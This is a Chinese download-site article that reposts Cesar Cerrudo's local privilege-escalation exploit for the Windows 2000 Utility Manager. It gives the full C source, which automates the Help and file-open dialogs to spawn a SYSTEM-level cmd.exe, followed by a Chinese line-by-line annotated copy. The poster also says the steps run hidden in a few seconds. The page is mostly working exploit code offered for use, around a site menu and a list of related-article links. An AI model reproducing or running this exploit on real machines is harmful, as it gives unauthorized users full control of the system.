| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

系统安全

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·Windows 2000 密码破解不完全指南
·修改系统DLL文件实现禁用来防止木马病毒!
·浅谈Win2000密码的必然破解
·NTFS文件加密初探
·目前实用的几种入侵方法 以及工具防范
·防范非法用户入侵Win 2000/XP系统七招
·守护进程的概念和建立方法
·Windows 2000密码破解不完全指南
·虚拟服务器实现方法
·虚拟文件系统 (VFS) 简介

站内搜索

W2kUtilManExp攻击程序代码及工具分析
这个是源代码: //by Cesar Cerrudo  sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.

#include "stdio.h"
#include "windows.h"


int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";

//  run utility manager
// system("utilman.exe /start");
// Sleep(500);

lHandle=FindWindow(NULL, "Utility manager");   
if (!lHandle) {
  printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
  return 0;
}

PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button in the taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1); //send WM_COMMANDHELP  0x0365  lParam must be <>NULL
Sleep(300);

SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN,
VK_RETURN, 0);
Sleep(500);


// find open file dialog window
lHandle = FindWindow("#32770","Open");

// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);

//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);
SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0);// close open error window
SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0);// close utility manager
return 0;
}
本人根据以上代码编译了一个小工具, 由于不是十分完善, 暂时不发布,只将UtilMan.exe的简单分析做了个说明:UtilMan.exe的新漏洞简单分析该漏洞在2k+sp4下测试成功.大概意思是:// By Cesar Cerrudo cesar appsecinc com// Local elevation of priviliges exploit for Windows Utility Manager得到一个系统权限的shellchar sText[]="%windir%\\system32\\cmd.ex?"; //不是.exe// 运行工具管理器//WinExec ("utilman.exe /start",SW_SHOW);//Sleep(500);// 打开帮助,这时执行了winhlp32.exe,4d号消息是未公开的相当于按下F1吧SendMessage(FindWindow(NULL, "工具管理器"), 0x4D, 0, 0);Sleep(500);// 打开文件打开对话框,winhlp32.exe中44d为菜单栏打开选项的IDPostMessage(FindWindow(NULL, "Windows 帮助"), WM_COMMAND, 0x44D, 0);//一定要是postmessageSleep(500);// 得到文件打开对话框句柄lHandle = FindWindow("#32770","打开");// 得到文件打开对话框中输入文件名编辑框的句柄,这个编辑框的ID为47clHandle2 = GetDlgItem(lHandle, 0x47C);Sleep(500);//设置文件名编辑框的值为cmd.ex?SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);Sleep(800);//输入回车,这样打开对话框的文件列表中就会显示.ex?文件,否则显示的//是.hlp文件,因为默认只能打开后缀是.hlp的文件.SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);//得到打开对话框左边的工具栏(就是历史,桌面,我的文档大图标)的句柄//ToolbarWindow32这个控件类名为lHandle2 = GetDlgItem(lHandle, 0x4A0);//发送tab消息,这样焦点就在右边的文件列表控件中了.SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);Sleep(500);//得到打开对话框的子控件文件列表控件的句柄lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);//得到列表控件的子控件syslistview32的句柄,控件id为1lHandle2 = GetDlgItem(lHandle2, 0x1);SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" charSendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" charSendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char//发送cmd这样是为了把焦点准确的落在cmd.exe上//奇怪的是手工一个一个的输入cmd则不行哟Sleep(800);// 打开右键菜单PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);Sleep(1000);//通过当前的光标位置来得到右键菜单句柄point.x =10; point.y =30;lHandle2=WindowFromPoint(point);SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // 在右键菜单中下移一个选项SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // 在右键菜单中下移一个选项这时落在打开上SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // 发送回车SendMessage (lHandle, WM_CLOSE,0,0); //关闭文件打开对话框return(0);}在单机运行此程序,以上的操作是隐藏性的,过程只有几秒钟时间至于它的利用条件~在进一步的参考中........ www.hackbase.com  小珂



相关文章
  • 浅谈如何在惊云下载系统中防范注入式攻击
  • 入侵NTserver典型途径攻击基础
  • 防范网页木马的攻击
  • 防范SQL注入式攻击JS版本
  • 用ASP.NET 1.1 新特征防止Script攻击
  • 剖析"拒绝服务"攻击-SYN拒绝服务
  • Winamp发现危险漏洞!攻击代码已经出现
  • 防范SQL注入式攻击
  • 中小型网站如何对付DoS攻击
  • php程序常见漏洞攻击宝典
  • 中小网站如何对付DoS攻击(中级)
  • SQLServer7.0sa帐号密码攻击法
  • 黑客攻击手段揭秘
  • SYN Flood攻击的基本原理及防御
  • 一次被DNS攻击后的分析
  • 防止E-MAIL信箱被攻击
  • 网络攻击概述
  • 修改注册表提高Win2000抗拒绝服务攻击能力
  • MYSQL用户root密码为弱口令又一攻击方法
  • 典型DoS攻击原理及抵御措施
  • 相关软件


    下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图